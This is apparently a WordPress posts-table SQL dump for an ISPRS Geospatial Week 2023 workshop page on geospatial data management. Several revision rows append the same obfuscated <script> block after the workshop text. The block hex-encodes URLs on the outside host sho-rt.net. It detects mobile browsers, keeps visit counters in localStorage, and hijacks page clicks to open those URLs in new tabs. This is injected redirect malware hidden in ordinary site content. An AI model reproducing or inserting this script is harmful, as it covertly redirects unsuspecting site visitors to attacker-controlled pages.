(2997,1,'2022-11-04 20:30:47','2022-11-04 20:30:47','','ws19m1','','inherit','open','closed','','ws19m1','','','2022-11-04 20:30:47','2022-11-04 20:30:47','',2996,'https://gsw2023.com/wp-content/uploads/2022/11/ws19m1.jpg',0,'attachment','image/jpeg',0),
(2998,1,'2022-11-04 20:31:03','2022-11-04 20:31:03','','<strong>Satellite Remote Sensing and Its Applications</strong>','','inherit','closed','closed','','2996-revision-v1','','','2022-11-04 20:31:03','2022-11-04 20:31:03','',2996,'https://gsw2023.com/?p=2998',0,'revision','',0),
(2999,1,'2022-11-04 20:33:48','2022-11-04 20:33:48','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 20:33:48','2022-11-04 20:33:48','',2993,'https://gsw2023.com/?p=2999',0,'revision','',0),
(3000,1,'2022-11-04 20:35:56','2022-11-04 20:35:56','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong>','','inherit','closed','closed','','2993-revision-v1','','','2022-11-04 20:35:56','2022-11-04 20:35:56','',2993,'https://gsw2023.com/?p=3000',0,'revision','',0),
(3001,1,'2022-11-04 20:36:18','2022-11-04 20:36:18','<p>[vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong>Advanced Data Preparation and Data Management for Geospatial and Remote Sensing Scenarios</strong></h4>\n<h5 style=\"text-align: center;\"><em>Joint workshop of ISPRS WG IV/4 “Data Management for Spatial Scenarios” and ICWG III/IVb “Remote Sensing Data Quality”</em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\">Today’s geospatial and remote sensing scenarios usually require the fusion of geometric, topological, and semantic data from a broad range of sources such as IoT and UAV sensors, mobile devices, BIM, GIS, digital twins, traffic simulations, and Smart Cites. Existing methods for preparation, modelling, and management of these data often cause a significant burden in data analysis processes. It is widely recognized that new advances in geospatial data preparation and management can accelerate the production of analysis-ready data and unlock the power of geospatial analytics. This workshop provides a platform to discuss new ways and best practices to prepare, model, and manage multi-dimensional geospatial and remote sensing data for static and (near) real-time applications. Contributions from academia and industry demonstrating innovative methods and tools, practical approaches, or research in progress are all welcome. The workshop will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related workshops. The event is a one-day single-track workshop of oral presentations and poster/networking sessions in the context of the ISPRS Geospatial Week 2023.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\